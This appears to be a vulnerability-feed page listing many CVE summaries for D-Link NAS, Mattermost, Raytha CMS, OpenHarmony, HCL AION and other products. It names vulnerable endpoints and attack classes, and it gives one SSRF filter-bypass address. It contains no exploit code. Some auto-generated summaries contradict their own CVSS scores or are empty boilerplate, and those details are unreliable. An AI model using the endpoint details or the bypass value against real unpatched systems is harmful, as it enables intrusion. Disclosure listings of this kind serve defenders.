Command Injection RCE Python Node.js Mcp Code Executor
CVE-2026-4198 MEDIUM CVSS 5.3
Local command injection in hypermodel-labs mcp-server-auto-commit 1.0.0 via the getGitChanges function in index.ts allows authenticated local attackers to execute arbitrary commands with the privileges of the affected process. Public exploit code exists for this vulnerability, and the vendor has not yet released a patch despite early notification.

Command Injection
CVE-2026-4197 MEDIUM CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-325 series, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, and DNS-1550-04 up to firmware version 20260205) allows authenticated remote attackers to execute arbitrary commands through the /cgi-bin/download_mgr.cgi file's RSS management functions. Public exploit code exists for this vulnerability, and no patch is currently available.

D-Link Command Injection RCE
CVE-2026-4196 MEDIUM CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-323-327L, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04 through firmware version 20260205) allows authenticated remote attackers to execute arbitrary commands via the /cgi-bin/remote_backup.cgi backup scheduling functions. Public exploit code exists for this vulnerability and no patch is currently available.

D-Link Command Injection RCE
CVE-2026-4195 MEDIUM CVSS 6.3
Command injection in D-Link NAS devices (DNS-120, DNR-202L, DNS-315L, DNS-320 series, DNS-323 through DNS-1550-04 with firmware prior to 20260205) allows authenticated remote attackers to execute arbitrary commands via the /cgi-bin/wizard_mgr.cgi endpoint. Public exploit code is available and no patch is currently available for affected users.

D-Link Command Injection RCE
CVE-2026-4193 MEDIUM CVSS 6.9
Improper access control in D-Link DIR-823G 1.0.2B05's goahead component allows unauthenticated remote attackers to manipulate multiple configuration functions including firewall, network, and security settings. The vulnerability affects a wide range of device management functions and has been publicly disclosed with no patch currently available. Affected organizations should implement network segmentation and access controls to limit exposure to this remotely exploitable flaw.

D-Link Information Disclosure
CVE-2026-3644 MEDIUM CVSS 6.0
CVE-2026-3644 is a security vulnerability (CVSS 6.0). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2026-3111 MEDIUM CVSS 6.9
An Insecure Direct Object Reference (IDOR) vulnerability exists in Campus Educativa at the endpoint '/archivos/usuarios/[ID]/[username]/thumb_AAxAA.jpg' that allows unauthenticated attackers to enumerate and download profile photographs of all users by manipulating URL parameters. Successful exploitation enables mass collection of user photos for identity impersonation, social engineering, facial recognition-based identity linking across platforms, and doxxing attacks. With a CVSS score of 6.9 and no authentication required, this vulnerability poses a moderate-to-significant risk to user privacy and security.

Information Disclosure Campus
CVE-2026-3024 MEDIUM CVSS 4.8
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Wakyma veterinary web application at the endpoint 'vets.wakyma.com/configuracion/agenda/modelo-formulario-evento', allowing authenticated users with low privileges to inject malicious scripts that persist in the application and execute in the browsers of other users, potentially enabling unauthorized data access and privilege escalation across the veterinary team. The vulnerability has a CVSS v4.0 base score of 4.8 (low-to-medium severity) but poses meaningful organizational risk due to its stored nature and the ability for low-privileged users to affect higher-privileged team members. No public exploit code or active exploitation in the wild has been reported at this time, though the attack requires only Network access and user interaction, making it feasible for insider threats.

XSS Privilege Escalation Information Disclosure Wakyma Application Web
CVE-2026-3023 MEDIUM CVSS 5.3
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma web application's 'vets.wakyma.com/pets/print-tags' endpoint that allows authenticated users to inject NoSQL commands via manipulated POST requests. An attacker with valid credentials can exploit this vulnerability to extract sensitive information including pet names and owner names from the backend database. With a CVSS score of 5.3 and low attack complexity, this represents a moderate confidentiality risk requiring prompt remediation despite the requirement for authentication.

SQLi Wakyma Application Web
CVE-2026-3021 MEDIUM CVSS 6.5
A non-relational SQL injection (NoSQLi) vulnerability exists in the Wakyma web application at the endpoint 'vets.wakyma.com/centro/equipo/empleado' that allows authenticated users to inject NoSQL commands and enumerate sensitive employee data. The vulnerability has a CVSS 4.0 score of 7.1 (High) with network attack vector requiring low privileges. No proof-of-concept code, EPSS data, or KEV listing information is currently available for this vulnerability.

SQLi Nosql Injection
CVE-2026-2578 MEDIUM CVSS 4.3
Mattermost versions 11.3.x up to and including 11.3.0 contain an information disclosure vulnerability where burn-on-read posts fail to maintain their redacted state when deleted, allowing authenticated channel members to view previously hidden message contents through WebSocket post deletion events. The vulnerability requires low-privilege authenticated access and results in confidentiality loss of sensitive communications that were intentionally designed to be self-destructing. With a CVSS score of 4.3 and network-based attack vector, this represents a meaningful but contained risk primarily affecting organizations relying on Mattermost's burn-on-read feature for secure internal communications.

Information Disclosure Mattermost Suse
CVE-2026-2463 MEDIUM CVSS 4.3
Mattermost fails to properly validate user permissions when filtering invite IDs during team creation, allowing authenticated users to bypass access controls and register unauthorized accounts using leaked or discovered invite tokens. Affected versions include Mattermost 11.3.0 and earlier in the 11.3.x branch, 11.2.2 and earlier in the 11.2.x branch, and 10.11.10 and earlier in the 10.11.x branch. An authenticated attacker with knowledge of valid invite IDs can circumvent intended access restrictions to create accounts that should be restricted, resulting in unauthorized account registration and potential lateral movement within the Mattermost instance.

Authentication Bypass Mattermost Suse
CVE-2026-2462 MEDIUM CVSS 6.6
This vulnerability in Mattermost allows unauthenticated attackers to achieve remote code execution and exfiltrate sensitive credentials through malicious plugin installation on CI test instances that retain default admin credentials. Affected versions include Mattermost 10.11.x through 10.11.10, 11.2.x through 11.2.2, and 11.3.0, with the core issue stemming from insufficient access controls on plugin installation combined with default credential exposure. An attacker can upload a malicious plugin after modifying the import directory to gain full system compromise and access AWS and SMTP credentials stored in configuration files.

RCE Authentication Bypass Mattermost
CVE-2026-2461 MEDIUM CVSS 4.3
Mattermost Plugins versions 11.3 and earlier fail to implement proper authorization checks on comment block modifications, allowing authenticated users with editor permissions to modify comments created by other board members without restriction. An authorized attacker can alter or tamper with comments from colleagues, potentially modifying project records, discussions, or audit trails. With a CVSS score of 4.3 and low attack complexity, this represents a moderate integrity risk in collaborative environments where comment authenticity is important, though exploitation requires prior authentication and editor-level access.

Authentication Bypass Suse
CVE-2026-2458 MEDIUM CVSS 4.3
This vulnerability is an improper access control flaw in Mattermost's channel search functionality that allows removed team members to enumerate all public channels within private teams. Affected versions include Mattermost 11.3.x through 11.3.0, 11.2.x through 11.2.2, and 10.11.x through 10.11.10. An authenticated attacker who has been removed from a team can query the channel search API endpoint to discover the complete list of public channels in that private team, resulting in information disclosure without requiring elevated privileges.

Authentication Bypass Mattermost Suse
CVE-2026-2457 MEDIUM CVSS 4.3
Mattermost fails to properly sanitize client-supplied post metadata in its post update API endpoint, allowing authenticated attackers to spoof permalink embeds and impersonate other users through crafted PUT requests. The vulnerability affects Mattermost versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier. While the CVSS score of 4.3 is moderate and requires authentication, the integrity impact allows attackers to deceive users by falsely attributing messages to legitimate users, potentially facilitating social engineering or misinformation campaigns within Mattermost instances.

Information Disclosure Mattermost Suse
CVE-2026-2456 MEDIUM CVSS 5.3
Mattermost fails to enforce response size limits on integration action endpoints, allowing an authenticated attacker to trigger server memory exhaustion and denial of service by clicking an interactive message button that connects to a malicious integration server returning arbitrarily large responses. This vulnerability affects Mattermost versions 11.3.0, 11.2.x up to 11.2.2, and 10.11.x up to 10.11.10. While the CVSS score of 5.3 is moderate, the attack requires user interaction (UI:R) and network access, but can be reliably triggered by any authenticated user interacting with crafted messages.

Denial Of Service Mattermost Suse
CVE-2026-2455 MEDIUM CVSS 4.3
Mattermost Server versions 11.3.0, 11.2.x through 11.2.2, and 10.11.x through 10.11.10 contain a server-side request forgery (SSRF) vulnerability due to improper validation of IPv4-mapped IPv6 addresses, allowing authenticated attackers to bypass reserved IP restrictions and access internal services. An attacker with login credentials can craft requests using IPv6 notation (such as [::ffff:127.0.0.1]) to reach localhost or other restricted internal endpoints that would normally be blocked. No patch is currently available for this vulnerability.

SSRF Mattermost Server Suse
CVE-2026-2454 MEDIUM CVSS 5.8
Mattermost versions 11.3.0 and earlier, 11.2.2 and earlier, and 10.11.10 and earlier contain an array length handling vulnerability in the calls plugin that allows unauthenticated remote attackers to trigger out-of-memory (OOM) errors and crash the server by sending maliciously crafted msgpack frames over websocket connections. With a CVSS score of 5.8 and network-based attack vector requiring no privileges or user interaction, this denial-of-service vulnerability poses a moderate but easily exploitable availability risk to any exposed Mattermost deployment.

Denial Of Service Mattermost
CVE-2026-1629 MEDIUM CVSS 4.3
Mattermost 10.11.x through 10.11.10 fails to clear cached permalink preview data when a user's channel access is revoked, allowing authenticated users to view private channel content through previously cached previews until the cache expires or they re-login. An authenticated attacker who previously had access to a private channel can exploit this to maintain visibility into sensitive channel communications after access removal. A patch is not currently available for this medium-severity vulnerability.

Information Disclosure Mattermost
CVE-2025-69727 MEDIUM CVSS 5.3
A security vulnerability in INDEX-EDUCATION PRONOTE (CVSS 5.3) that allows the construction of direct urls. Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2025-69693 MEDIUM CVSS 5.4
Out-of-bounds read in FFmpeg 8.0 and 8.0.1 RV60 video decoder (libavcodec/rv60dec.c).

Buffer Overflow Information Disclosure Redhat Suse
CVE-2025-69246 MEDIUM CVSS 6.9
Raytha CMS lacks brute force protection mechanisms, allowing attackers to conduct unlimited automated login attempts without triggering account lockout, rate limiting, or multi-factor authentication challenges. Versions prior to 1.4.6 are affected, and an attacker can systematically enumerate valid usernames and crack passwords through high-volume credential stuffing attacks. The vulnerability represents a significant authentication bypass risk that could lead to unauthorized administrative access depending on password strength and user enumeration feasibility.

Information Disclosure Raytha
CVE-2025-69245 MEDIUM CVSS 5.1
Raytha CMS contains a Reflected Cross-Site Scripting (XSS) vulnerability in the logon functionality's returnUrl parameter that allows attackers to inject arbitrary JavaScript code. When an authenticated victim clicks a malicious URL crafted by an attacker, the injected script executes in the victim's browser with the victim's privileges, potentially enabling session hijacking, credential theft, or unauthorized actions within the CMS. The vulnerability was remediated in version 1.4.6, and while no CVSS score or EPSS data is currently available, the nature of XSS in authentication contexts represents a significant security risk requiring prompt patching.

XSS Open Redirect Raytha
CVE-2025-69243 MEDIUM CVSS 6.9
Raytha CMS contains a user enumeration vulnerability in its password reset functionality where differing error messages reveal whether a login exists in the system, enabling attackers to build valid user lists for targeted brute force attacks. This vulnerability affects Raytha CMS versions prior to 1.5.0. The moderate CVSS score of 6.9 reflects the information disclosure risk, though real-world impact depends on how attackers chain this enumeration with other attacks.

Information Disclosure Raytha
CVE-2025-69242 MEDIUM CVSS 5.1
Raytha CMS contains a reflected cross-site scripting (XSS) vulnerability in the backToListUrl parameter that allows unauthenticated attackers to inject arbitrary JavaScript code. When an authenticated victim visits a specially crafted malicious URL, the injected script executes in their browser context, potentially allowing session hijacking, credential theft, or malware distribution. The vulnerability was patched in version 1.4.6, and while the CVSS score of 5.1 is moderate, the attack requires user interaction (UI:A) but no authentication, making it a practical attack vector against admin users.

XSS Raytha
CVE-2025-69241 MEDIUM CVSS 5.3
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the profile editing functionality, specifically within the FirstName and LastName parameters. An authenticated attacker can inject arbitrary HTML and JavaScript code that persists in the application and executes in the browsers of users viewing the compromised profile, potentially leading to session hijacking, credential theft, or defacement. This vulnerability has been remediated in version 1.4.6.

XSS Raytha
CVE-2025-69239 MEDIUM CVSS 5.1
Raytha CMS contains a Server-Side Request Forgery (SSRF) vulnerability in its Theme Import from URL feature that allows authenticated high-privilege users to manipulate server-side HTTP requests to arbitrary destinations. An attacker with administrative or similar elevated privileges can leverage this to redirect the CMS server's outbound requests to internal systems, external resources, or arbitrary URLs, potentially leading to information disclosure or lateral movement attacks. The vulnerability affects versions prior to 1.4.6 and is fixed in version 1.4.6 and later.

SSRF Raytha
CVE-2025-69238 MEDIUM CVSS 6.9
Raytha CMS contains a Cross-Site Request Forgery (CSRF) vulnerability across multiple endpoints that fails to enforce token verification on POST requests. An authenticated user can be tricked into visiting a malicious website crafted by an attacker, which automatically submits unauthorized requests (such as data deletion) to the Raytha CMS application without requiring explicit user confirmation. This vulnerability affects Raytha CMS versions prior to 1.4.6 and has a CVSS score of 6.9 with medium real-world exploitability.

CSRF Raytha
CVE-2025-69237 MEDIUM CVSS 5.1
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the page creation functionality through the FieldValues[0].Value parameter, allowing authenticated attackers with content creation permissions to inject malicious HTML and JavaScript that executes when other users visit the edited page. The vulnerability affects Raytha CMS versions prior to 1.4.6 and has a CVSS score of 5.1 with limited scope impact due to required authentication and user interaction. While not currently listed in CISA's Known Exploited Vulnerabilities catalog, the low attack complexity and availability of vendor patch make this a moderate but manageable risk for deployed instances.

XSS Authentication Bypass Raytha
CVE-2025-69236 MEDIUM CVSS 5.1
Raytha CMS contains a Stored Cross-Site Scripting (XSS) vulnerability in the post editing functionality, specifically within the FieldValues[1].Value parameter that fails to sanitize user input before storage and rendering. An authenticated attacker with post editing permissions can inject malicious HTML and JavaScript code that persists in the database and executes in the browsers of any user viewing the affected post, potentially leading to session hijacking, credential theft, or defacement. The vulnerability affects versions prior to 1.4.6 and does not appear to be actively exploited in the wild based on available intelligence, though the low CVSS score of 5.1 reflects the requirement for prior authentication and user interaction rather than the severity of the potential impact.

XSS Raytha
CVE-2025-69196 MEDIUM CVSS 6.5
A remote code execution vulnerability (CVSS 6.5). Remediation should follow standard vulnerability management procedures.

Authentication Bypass Python Redhat
CVE-2025-68971 MEDIUM CVSS 6.5
In Forgejo through 13.0.3, the attachment component allows a denial of service by uploading a multi-gigabyte file attachment (e.g., to be associated with an issue or a release).

Denial Of Service Redhat Suse
CVE-2025-65734 MEDIUM CVSS 5.4
An authenticated arbitrary file upload vulnerability in the Courses/Work Assignments module of gunet Open eClass v3.11, and fixed in v3.13, allows attackers to execute arbitrary code via uploading a crafted SVG file.

RCE XSS File Upload
CVE-2025-57543 MEDIUM CVSS 6.1
Cross Site scripting vulnerability (XSS) in NetBox 4.3.5 "comment" field on object forms.

XSS
CVE-2025-52648 MEDIUM CVSS 4.8
A security vulnerability in HCL AION (CVSS 4.8). Remediation should follow standard vulnerability management procedures.

Information Disclosure Jwt Attack
CVE-2025-52644 MEDIUM CVSS 5.8
HCL AION contains inadequate auditing and logging mechanisms that fail to properly track certain user actions, reducing the traceability of user activities and potentially compromising monitoring, accountability, and incident investigation capabilities. The vulnerability affects AION 2.0 and is classified as an Information Disclosure issue with a CVSS score of 5.8. An attacker with local access and low privileges could exploit this to perform actions without adequate logging, hindering forensic analysis and compliance audit trails.

Information Disclosure Aion
CVE-2025-52643 MEDIUM CVSS 4.7
A security vulnerability in HCL AION (CVSS 4.7). Remediation should follow standard vulnerability management procedures.

Information Disclosure Aion
CVE-2025-52638 MEDIUM CVSS 5.6
HCL AION contains a container base image authentication vulnerability where container images are not properly verified before deployment, potentially allowing attackers to execute untrusted or malicious container images within the AION environment. This affects AION 2.0 and could enable attackers with local access and high privileges to compromise system integrity and availability. No public evidence of active exploitation or POC availability has been identified in the provided intelligence sources.

Information Disclosure
CVE-2025-52637 MEDIUM CVSS 4.5
HCL AION contains a SQL injection or improper query validation vulnerability that allows authenticated local users with low privileges to execute potentially harmful SQL queries against the database. The vulnerability affects certain offering configurations and could lead to limited information disclosure, data modification, or denial of service under specific conditions. With a CVSS score of 4.5 and local attack vector requirement, this represents a moderate-risk vulnerability primarily exploitable by insider threats or compromised local accounts.

Information Disclosure SQLi
CVE-2025-52458 MEDIUM CVSS 5.5
An out-of-bounds write vulnerability (CWE-787) exists in OpenHarmony versions up to and including v5.1.0, enabling local attackers to execute arbitrary code within pre-installed applications. The vulnerability requires local access and low privileges but can result in complete confidentiality compromise. This is a memory corruption issue that, while restricted to specific scenarios, poses a meaningful risk to OpenHarmony device security given the local attack vector and high impact on confidentiality.

RCE Buffer Overflow Memory Corruption Openharmony
CVE-2025-41432 MEDIUM CVSS 5.5
An out-of-bounds write vulnerability in OpenHarmony v5.1.0 and earlier versions allows local attackers with limited privileges to achieve arbitrary code execution within pre-installed applications through memory corruption. The vulnerability, tracked as CVE-2025-41432 and assigned CVSS 5.5, exploits CWE-787 (out-of-bounds write) and is limited to restricted attack scenarios that require local access and low privilege levels. While not currently listed in CISA's Known Exploited Vulnerabilities (KEV) catalog, the availability of vulnerability disclosure documentation and the nature of memory corruption bugs suggest heightened risk for motivated threat actors.

RCE Buffer Overflow Memory Corruption Openharmony
CVE-2025-25277 MEDIUM CVSS 6.3
This vulnerability allows arbitrary code execution in OpenHarmony pre-installed applications through improper handling of incompatible types, enabling local attackers to escalate privileges and execute arbitrary code within the context of trusted system applications. Affected versions include OpenHarmony v5.0.3 through v5.1.0.x, impacting the core application framework across the OpenHarmony ecosystem. While the CVSS score of 6.3 reflects moderate severity, the vulnerability requires local access and high attack complexity, limiting real-world exploitability to restricted scenarios as noted by the vendor.

RCE Memory Corruption Openharmony
CVE-2025-15554 MEDIUM CVSS 6.0
LAPSWebUI before version 2.4 by Truesec improperly caches LAPS (Local Administrator Password Solution) passwords in browser storage, allowing a local attacker with user-level access to retrieve plaintext or weakly protected admin credentials from the browser cache. An attacker who gains access to a workstation where an administrator has used LAPSWebUI can escalate privileges to local administrator by exploiting this caching behavior. While the CVSS score is moderate at 6.0, the practical impact is high because successful exploitation directly enables privilege escalation to administrative access.

Privilege Escalation
CVE-2025-15553 MEDIUM CVSS 6.0
LAPSWebUI before version 2.4 contains a non-functional logout mechanism that allows an authenticated local attacker to obtain elevated privileges through disclosure of cached local administrator passwords. An attacker with existing workstation access and low privileges can exploit this flaw to escalate to local admin by recovering credentials that should have been cleared upon session termination. The vulnerability carries a CVSS v4.0 score of 6.0 (Medium) with local attack vector and requires prior login plus user interaction, though the confidentiality impact on sensitive credentials is marked as high.

Privilege Escalation Lapswebui
CVE-2025-15552 MEDIUM CVSS 6.0
Insufficient Session Expiration in Truesec's LAPSWebUI before version 2.4 allows local attackers with user-level privileges to obtain local administrator passwords through inadequate session management controls. An attacker with physical or logical access to a workstation can exploit this vulnerability to escalate privileges and disclose sensitive credentials, potentially compromising domain administration. This vulnerability represents a practical privilege escalation risk in environments relying on LAPS (Local Administrator Password Solution) for credential management.

Privilege Escalation Information Disclosure Lapswebui
CVE-2025-12736 MEDIUM CVSS 6.5
OpenHarmony versions 5.0.3 and earlier contain an information disclosure vulnerability caused by use of uninitialized resources, allowing local attackers to leak sensitive case-sensitive data. The vulnerability affects OpenHarmony deployments across all product lines up to v5.0.3.x (per EUVD-2025-208673). An attacker with local access and standard user privileges can read uninitialized memory regions to obtain confidential information without requiring user interaction, though there is no indication of active exploitation in public KEV databases at this time.

Information Disclosure Openharmony
CVE-2025-10461 MEDIUM CVSS 5.3
A arbitrary file access vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.

Information Disclosure Docker
CVE-2025-6969 MEDIUM CVSS 5.0
OpenHarmony versions 5.1.0 and prior contain an improper input validation vulnerability (CWE-20) that allows local attackers with low privileges to trigger a denial of service condition. An authenticated local user can craft malicious input that causes the system to become unresponsive or crash, requiring manual intervention to restore availability. While this vulnerability has a moderate CVSS score of 5.0, the local-only attack vector and requirement for user interaction limit widespread exploitation risk.

Information Disclosure Openharmony
CVE-2025-2274 MEDIUM CVSS 4.8
Improper Neutralization of Input During Web Page Generation in Forcepoint Web Security (On-Prem) on Windows allows Stored XSS.This issue affects Web Security through 8.5.6.

XSS Windows
CVE-2017-20221 MEDIUM CVSS 4.3
A cross-site request forgery (CSRF) vulnerability exists in Telesquare SKT LTE Router SDT-CS3B1 version 1.2.0 that allows authenticated attackers to execute arbitrary system commands without additional validation. An attacker can craft a malicious webpage that, when visited by a logged-in router administrator, triggers unauthorized administrative actions with full router privileges. While the CVSS score of 4.3 is moderate and no active exploitation has been widely reported, the ability to achieve command execution on network infrastructure devices represents a meaningful risk to affected deployments.

CSRF Sdt Cs3b1
CVE-2026-32778 LOW CVSS 2.9
libexpat before version 2.7.5 contains a NULL pointer dereference vulnerability in the setContext function that occurs when the library retries operations following an out-of-memory condition. This flaw affects all users of vulnerable libexpat versions and can result in application crashes leading to denial of service. While the CVSS score of 2.9 is low and exploitation requires specific local conditions and high complexity, this vulnerability represents a stability risk for XML parsing operations in memory-constrained or stressed environments.

Denial Of Service Null Pointer Dereference
CVE-2026-32722 LOW CVSS 3.6
## Summary Prior to Memray 1.19.2, Memray rendered the command line of the tracked process directly into generated HTML reports without escaping.

Python XSS
CVE-2026-32638 LOW CVSS 2.7
CVE-2026-32638 is a security vulnerability (CVSS 2.7). Remediation should follow standard vulnerability management procedures. Vendor patch is available.

Authentication Bypass
CVE-2026-32266 LOW
Unauthenticated users can view a list of buckets the plugin has access to.

CSRF Information Disclosure
CVE-2026-29522 None
ZwickRoell Test Data Management versions prior to 3.0.8 contain a local file inclusion (LFI) vulnerability in the /server/node_upgrade_srv.js endpoint.

Path Traversal Information Disclosure
CVE-2026-26230 LOW CVSS 3.8
Mattermost versions 10.11.x <= 10.11.10 fail to properly validate permission requirements in the team member roles API endpoint which allows team administrators to demote members to guest role.

Authentication Bypass
CVE-2026-22545 LOW CVSS 3.1
CVE-2026-22545 is a security vulnerability (CVSS 3.1) that allows an authenticated attacker. Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2026-20992 LOW CVSS 3.3
An improper authorization vulnerability in Samsung Settings allows a local attacker with low privileges to disable configuration of background data usage for applications prior to the SMR Mar-2026 Release 1 patch. While the CVSS score of 4.8 is moderate, the vulnerability has limited impact as it only affects the integrity of data usage settings without enabling data exfiltration or system compromise. The local attack vector and requirement for user-level privileges significantly reduce real-world exploitation likelihood compared to remote or privilege-escalation vulnerabilities.

Authentication Bypass
CVE-2026-20989 LOW CVSS 2.4
This vulnerability involves improper cryptographic signature verification in the Font Settings component of Samsung devices prior to the March 2026 Security Update Release 1. A physical attacker can bypass signature validation to install custom fonts, potentially leading to integrity compromise of system font resources. While the CVSS score is moderate at 5.1, the attack requires physical access and user interaction, limiting real-world exploitation frequency.

Information Disclosure Jwt Attack
CVE-2026-4251 LOW CVSS 2.5
A remote code execution vulnerability in CityData CityChat (CVSS 2.5). Risk factors: public PoC available.

Information Disclosure Google Android
CVE-2026-4250 LOW CVSS 2.5
A remote code execution vulnerability in Albert Sağlık Hizmetleri ve Ticaret Albert Health (CVSS 2.5). Risk factors: public PoC available.

Google Information Disclosure Android
CVE-2026-4243 LOW CVSS 2.5
A weakness has been identified in La Nacion App 10.2.25 on Android.

Java Authentication Bypass Google Android
CVE-2026-4242 LOW CVSS 2.5
A security vulnerability in A security flaw (CVSS 2.5). Risk factors: public PoC available.

Google Information Disclosure Java Android
CVE-2026-4239 LOW CVSS 3.5
A vulnerability was found in Lagom WHMCS Template up to 2.3.7.

Code Injection Information Disclosure
CVE-2026-4225 LOW CVSS 2.4
A cross-site scripting (XSS) vulnerability exists in CMS Made Simple versions up to 2.2.21 affecting the User Management Module's admin/listusers.php file. An attacker with high-level privileges can inject malicious JavaScript through the Message parameter to compromise other users' sessions or steal sensitive data. Public exploit code is available and the vulnerability has been actively exploited, making this a tangible threat despite its low CVSS score of 2.4.

PHP XSS
CVE-2026-4222 LOW CVSS 3.8
A path traversal vulnerability exists in SSCMS versions up to 7.4.0 within the PathUtils.RemoveParentPath function of the plugin download API endpoint (/api/admin/plugins/install/actions/download). An authenticated administrator with high privileges can manipulate the path argument to traverse the file system and access or modify files outside the intended directory, potentially leading to information disclosure or system compromise. The vulnerability has public proof-of-concept code available, though the CVSS score of 3.8 is relatively low due to the requirement for authenticated administrative access, making this a lower-priority but still exploitable issue in environments where admin credentials may be compromised.

Path Traversal
CVE-2026-4219 LOW CVSS 3.3
A hard-coded credentials vulnerability exists in the INDEX Conferences & Exhibitions Organization YWF BPOF APGCS Android application (versions up to 1.0.2) where attackers can manipulate ACCESS_KEY and HASH_KEY arguments in the BuildConfig.java component to extract embedded credentials. The vulnerability requires local execution on the device and grants only confidentiality impact (CWE-798: Use of Hard-Coded Credentials), but the existence of a published exploit and vendor non-responsiveness elevate practical risk despite the low CVSS score of 3.3.

Google Authentication Bypass Java Android
CVE-2026-4218 LOW CVSS 2.5
A local information disclosure vulnerability exists in myAEDES App versions up to 1.18.4 on Android, stemming from improper handling of the AUTH_KEY argument in the EngageBayUtils.java component. An authenticated local attacker with high complexity can manipulate this parameter to disclose sensitive information, though the attack requires local device access and significant technical effort. A public proof-of-concept exploit is now available, and the vendor has not responded to early disclosure attempts.

Information Disclosure Java Google Android
CVE-2026-4217 LOW CVSS 2.5
A key management error exists in the XREAL Nebula App (Android) up to version 3.2.1, specifically in the CloudStoragePlugin.java component where accessKey, secretAccessKey, and securityToken arguments are improperly handled. An attacker with local access and moderate privileges can manipulate these credentials to bypass authentication controls, resulting in unauthorized information disclosure. A proof-of-concept has been publicly disclosed, though the vulnerability requires high complexity to exploit and the vendor has not responded to early notification.

Java Google Information Disclosure Android
CVE-2026-0639 LOW CVSS 3.3
This vulnerability is a memory leak in OpenHarmony v6.0 and prior versions that allows a local, low-privileged attacker to trigger a denial-of-service condition by preventing proper memory release during runtime operations. An authenticated local user without special privileges can exhaust system memory through repeated triggering of the affected code path, causing application or system instability. The low CVSS score of 3.3 reflects the limited scope (local access only, no confidentiality or integrity impact), but the underlying memory management flaw (CWE-401: Missing Release of Memory) is a classic stability threat in systems software.

Information Disclosure
CVE-2025-71264 LOW CVSS 3.7
Mumble before version 1.6.870 contains an out-of-bounds array access vulnerability (CWE-125) that allows remote attackers to crash the client application, resulting in denial of service. The vulnerability requires network access but no authentication or user interaction, affecting all users of vulnerable Mumble client versions. While the CVSS score of 3.7 is relatively low and only impacts availability with no confidentiality or integrity compromise, this vulnerability poses a practical risk to voice communication availability in production deployments.

Buffer Overflow Denial Of Service Information Disclosure
CVE-2025-54758 None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. No vendor patch available.

Information Disclosure
CVE-2025-53815 None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. No vendor patch available.

Information Disclosure
CVE-2025-53517 None
Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. No vendor patch available.

Information Disclosure
CVE-2025-52649 LOW CVSS 1.8
HCL AION is affected by a vulnerability where certain identifiers may be predictable in nature.

Information Disclosure
CVE-2025-52646 LOW CVSS 2.2
HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries.

Information Disclosure SQLi
CVE-2025-52645 LOW CVSS 1.9
A security vulnerability in HCL AION (CVSS 1.9). Remediation should follow standard vulnerability management procedures.

Information Disclosure
CVE-2025-52642 LOW CVSS 3.3
HCL AION is affected by a vulnerability where internal filesystem paths may be exposed through application responses or system behaviour.

Information Disclosure
CVE-2025-52636 LOW CVSS 1.8
A remote code execution vulnerability in HCL AION (CVSS 1.8). Remediation should follow standard vulnerability management procedures.

Denial Of Service
CVE-2025-26474 LOW CVSS 3.3
OpenHarmony v5.0.3 and prior versions contain an improper input validation vulnerability (CWE-20) that allows a local attacker with limited privileges to read sensitive information from the system. The vulnerability carries a CVSS score of 3.3 with low attack complexity and requires local access and low privileges, indicating a confined risk profile suitable only for restricted exploitation scenarios. While the CVSS vector does not indicate active exploitation or widespread POC availability based on the provided data, the information disclosure impact warrants attention in environments where local privilege escalation chains may amplify the risk.

Information Disclosure

Today's Vulnerabilities Vulnerabilities